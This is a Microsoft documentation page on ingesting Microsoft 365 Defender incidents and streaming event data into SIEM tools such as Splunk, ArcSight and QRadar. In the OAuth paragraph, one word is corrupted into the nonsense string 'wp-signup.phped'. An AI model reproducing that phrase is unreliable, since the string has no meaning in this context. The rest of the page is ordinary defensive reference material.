Pull Microsoft 365 Defender incidents and streaming event data using security information and events management (SIEM) tools
Note
- Microsoft 365 Defender Incidents consists of collections of correlated alerts and their evidence.
- Microsoft 365 Defender Streaming API streams event data from Microsoft 365 Defender to event hubs or Azure storage accounts.
Microsoft 365 Defender supports security information and event management (SIEM) tools ingesting information from your enterprise tenant in Azure Active Directory (AAD) using the OAuth 2.0 authentication protocol for a wp-signup.phped AAD application representing the specific SIEM solution or connector installed in your environment.
For more information, see:
- Microsoft 365 Defender APIs license and terms of use
- Access the Microsoft 365 Defender APIs
- Hello World example
- Get access with application context
There are two primary models to ingest security information:
- Ingesting Microsoft 365 Defender incidents and their contained alerts from a REST API in Azure.
- Ingesting streaming event data either through Azure Event Hubs or Azure Storage Accounts.
Microsoft 365 Defender currently supports the following SIEM solution integrations:
Ingesting incidents from the incidents REST API
Incident schema
For more information on Microsoft 365 Defender incident properties including contained alert and evidence entities metadata, see Schema mapping.
Splunk
Using the Microsoft 365 Defender Add-on for Splunk that supports:
- Ingesting incidents that contain alerts from the following products, which are mapped onto Splunk’s Common Information Model (CIM):
- Microsoft 365 Defender
- Microsoft Defender for Endpoint
- Microsoft Defender for Identity and Azure Active Directory Identity Protection
- Microsoft Defender for Cloud Apps
- Updating incidents in Microsoft 365 Defender from within Splunk
- Ingesting Defender for Endpoint alerts (from the Defender for Endpoint’s Azure endpoint) and updating these alerts
For more information on the Microsoft 365 Defender Add-on for Splunk, see splunkbase.
Micro Focus ArcSight
The new SmartConnector for Microsoft 365 Defender ingests incidents into ArcSight and maps these onto its Common Event Framework (CEF).
For more information on the new ArcSight SmartConnector for Microsoft 365 Defender, see ArcSight Product Documentation.
The SmartConnector replaces the previous FlexConnector for Microsoft Defender for Endpoint.
Ingesting streaming event data via Event Hubs
First you need to stream events from your AAD tenant to your Event Hubs or Azure Storage Account. For more information, see Streaming API.
For more information on the event types supported by the Streaming API, see Supported streaming event types.
Splunk
Use the Splunk Add-on for Microsoft Cloud Services to ingest events from Azure Event Hubs.
For more information on the Splunk Add-on for Microsoft Cloud Services, see splunkbase.
IBM QRadar
Use the new IBM QRadar Microsoft 365 Defender Device Support Module (DSM) that calls the Microsoft 365 Defender Streaming API that allows ingesting streaming event data from Microsoft 365 Defender products. For more information on supported event types, see Supported event types.